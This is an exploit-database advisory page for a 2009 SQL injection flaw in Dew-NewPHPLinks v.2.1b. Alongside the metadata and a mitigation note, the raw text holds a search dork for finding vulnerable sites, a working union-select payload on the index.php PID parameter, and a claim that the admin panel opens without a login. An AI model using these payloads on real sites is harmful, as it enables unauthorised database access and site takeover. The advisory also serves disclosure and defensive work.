header-logo
Suggest Exploit
vendor:
Dew-NewPHPLinks
by:
AtT4CKxT3rR0r1ST
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Dew-NewPHPLinks
Affected Version From: 2.1b
Affected Version To: 2.1b
Patch Exists: No
Related CWE: N/A
CPE: a:dew-code:dew-newphplinks
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Dew-NewPHPLinks v.2.1b (index.php) Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the URL. This can allow the attacker to gain access to the database and execute arbitrary commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

Dew-NewPHPLinks v.2.1b (index.php) Sql Injection Vulnerability
======================================================================

######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.dew-code.com/
.:. Dork           : "Powered By Dew-NewPHPLinks v.2.1b" 
.:. Special Gr34T$ T0 ZaIdOoHxHaCkEr

######################################################################

===[ Exploit ]===
First:
=======
www.site.com/index.php?PID=9999[Sql Injection]

www.site.com/index.php?PID=9999+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user()),2

Second:
=======
Bypass join Control Admin 
Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password

######################################################################

txt